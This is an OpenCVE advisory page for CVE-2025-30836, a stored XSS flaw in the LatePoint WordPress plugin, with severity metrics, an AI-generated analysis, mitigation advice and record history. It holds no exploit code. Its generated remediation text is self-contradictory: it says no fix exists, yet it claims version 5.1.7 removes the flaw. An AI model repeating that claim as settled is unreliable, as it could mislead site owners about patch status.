Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint latepoint allows Stored XSS.This issue affects LatePoint: from n/a through <= 5.1.6.
Published: 2025-03-27
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Stored cross‑site scripting occurs when unsanitized input is saved in the database and later displayed on a web page. In LatePoint, the plugin accepts user‑generated content that is rendered without proper neutralization, giving an attacker the ability to inject JavaScript. Successful exploitation could let an attacker run scripts in the context of authenticated users, potentially hijacking sessions, defacing site content, or distributing malware.

Affected Systems

WordPress sites that use the LatePoint booking plugin version 5.1.6 or earlier are affected. The vulnerability is present in all releases from the initial release through 5.1.6, as the input handling was never corrected before that point.

Risk and Exploitability

The CVSS score of 6.5 indicates medium severity, but the EPSS score is below 1%, suggesting that exploitation is currently rare. The attack vector that the description implies is a stored XSS, where an attacker likely submits malicious content via the plugin’s input fields while logged in or through an exposed management interface. Because the exploit requires write access to plugin data, the risk is limited to users who can add or modify booking information. The vulnerability is not currently listed in CISA KEV, indicating no known mass‑deployment attacks yet.

Generated by OpenCVE AI on May 1, 2026 at 03:56 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the LatePoint plugin to version 5.1.7 or later, which removes the unsanitized input pathway.
  • If an upgrade is not yet available, restrict or disable any booking‑creation or editing features that allow unsanitized input until a patch exists.
  • Apply output encoding or content filtering on any user‑generated fields rendered by the plugin, for example by using WordPress’s wp_kses function, to ensure scripts are escaped.
  • Audit and clean existing booking records and related content for embedded scripts that may have been inserted before the patch.

Generated by OpenCVE AI on May 1, 2026 at 03:56 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-8361 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint latepoint allows Stored XSS.This issue affects LatePoint: from n/a through <= 5.1.6.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Thu, 27 Mar 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 27 Mar 2025 11:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6.
Title WordPress LatePoint plugin <= 5.1.6 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Latepoint Latepoint
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:58.351Z

Reserved: 2025-03-26T09:20:47.108Z

Link: CVE-2025-30836

cve-icon Vulnrichment

Updated: 2025-03-27T13:22:52.788Z

cve-icon NVD

Status : Deferred

Published: 2025-03-27T11:15:44.930

Modified: 2026-04-23T15:27:09.930

Link: CVE-2025-30836

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-01T04:00:06Z

Weaknesses